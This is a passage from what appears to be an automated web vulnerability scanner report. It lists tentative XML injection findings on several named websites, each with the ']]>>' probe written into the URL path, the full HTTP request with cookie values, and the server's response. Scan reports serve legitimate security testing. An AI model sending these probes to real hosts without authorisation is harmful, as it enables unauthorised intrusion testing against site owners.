Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=1800
Content-Type: text/html
Date: Sun, 15 May 2011 20:02:33 GMT
Expires: Sun, 15 May 2011 20:32:34 GMT
Server: EOS (lax001/54D7)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.59. http://trk.cetrk.com/s [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://trk.cetrk.com
Path:   /s

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /s]]>>?146645&1305489679&AACxAwCAsYMDAAAAABwCaAEZc2VsZWN0ZWRfZXZlbnRfaW1hZ2VfbGluawBUdHdlZXRiZWF0LmNvbS9ldmVudHMvMTc2MTItbWVtcGhpcy1ncml6emxpZXMtb2tsYWhvbWEtY2l0eS10aHVuZGVyLWdhbWUtNz9tcWhvbT1tYW5pVHR3ZWV0YmVhdC5jb20vZXZlbnRzLzE3NjEyLW1lbXBoaXMtZ3JpenpsaWVzLW9rbGFob21hLWNpdHktdGh1bmRlci1nYW1lLTc_bXFob209bWFuaRRzZWxlY3RlZF9ldmVudF9pbWFnZQ HTTP/1.1
Host: trk.cetrk.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 1CD65E5EA0829312
x-amz-id-2: f8qBMqCIxhvl+G+aGphUQEbhL8KMAu6I1Z6xXWRbxLX1idZlkl8EcT+tT+H333Vh
Content-Type: application/xml
Date: Sun, 15 May 2011 20:04:44 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1CD65E5EA0829312</RequestId><HostId>f8qBMqCIxhvl+G+aGphUQEbhL8KMAu6I1Z6xXWRbxLX1idZlkl
...[SNIP]...

8.60. http://trk.cetrk.com/t.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://trk.cetrk.com
Path:   /t.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /t.js]]>>?s=146645&t=1305489673665 HTTP/1.1
Host: trk.cetrk.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 5FF999DFDB9F9A64
x-amz-id-2: X2JJhxevvL0qZP7bBgaIN1dtuMjQMNp2J4QDXnHg4yqTZHfj+mtXiOJwhA0ZOXWc
Content-Type: application/xml
Date: Sun, 15 May 2011 20:04:37 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5FF999DFDB9F9A64</RequestId><HostId>X2JJhxevvL0qZP7bBgaIN1dtuMjQMNp2J4QDXnHg4yqTZHfj+m
...[SNIP]...

8.61. http://www.kol.co.nz/css/ie_hacks.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /css/ie_hacks.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css]]>>/ie_hacks.css HTTP/1.1
Host: www.kol.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11577963.1305480320.1.1.utmcsr=orcon.net.nz|utmccn=(referral)|utmcmd=referral|utmcct=/about/browse/category/acquisitions/; __utma=11577963.112339897.1305480320.1305480320.1305480320.1; __utmc=11577963; __utmb=11577963.1.10.1305480320;

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:40:27 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Length: 5754
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.62. http://www.kol.co.nz/css/ie_hacks.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /css/ie_hacks.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css/ie_hacks.css]]>> HTTP/1.1
Host: www.kol.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11577963.1305480320.1.1.utmcsr=orcon.net.nz|utmccn=(referral)|utmcmd=referral|utmcct=/about/browse/category/acquisitions/; __utma=11577963.112339897.1305480320.1305480320.1305480320.1; __utmc=11577963; __utmb=11577963.1.10.1305480320;

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:40:43 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Length: 5754
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.63. http://www.kol.co.nz/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /css/print.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css]]>>/print.css HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:41:00 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.64. http://www.kol.co.nz/css/print.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /css/print.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css/print.css]]>> HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:41:44 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.65. http://www.kol.co.nz/css/stylev1.53.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /css/stylev1.53.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css]]>>/stylev1.53.css?cachebreaker=09062010 HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:28:34 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.66. http://www.kol.co.nz/css/stylev1.53.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /css/stylev1.53.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css/stylev1.53.css]]>>?cachebreaker=09062010 HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:29:17 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.67. http://www.kol.co.nz/js/domfunction.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /js/domfunction.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js]]>>/domfunction.js HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:40:39 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.68. http://www.kol.co.nz/js/domfunction.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /js/domfunction.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js/domfunction.js]]>> HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:41:22 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.69. http://www.kol.co.nz/js/utils.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /js/utils.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js]]>>/utils.js HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:40:39 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.70. http://www.kol.co.nz/js/utils.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /js/utils.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js/utils.js]]>> HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:41:22 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.71. http://www.kosmix.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /c-javascripts]]>>/kapp_relevance.js?1302816008 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:12 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=c-javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:12 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:12 GMT;path=/
Content-Length: 16275

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.72. http://www.kosmix.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /c-javascripts/kapp_relevance.js]]>>?1302816008 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:31 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=c-javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:31 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:31 GMT;path=/
Content-Length: 16297

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.73. http://www.kosmix.com/images/ck.txt [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/ck.txt

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/ck.txt?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&ckid=1086031566&m=footer&r=1010200&c=1&ct=staticclick&x=806&y=923&v=29&p=site_footer HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; __qca=P0-1290282890-1305489649089; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:24 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:24 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:24 GMT;path=/
Content-Length: 16494

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.74. http://www.kosmix.com/images/ck.txt [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/ck.txt

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/ck.txt]]>>?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&ckid=1086031566&m=footer&r=1010200&c=1&ct=staticclick&x=806&y=923&v=29&p=site_footer HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; __qca=P0-1290282890-1305489649089; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:41 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:41 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:41 GMT;path=/
Content-Length: 16520

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.75. http://www.kosmix.com/images/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/favicon.ico HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
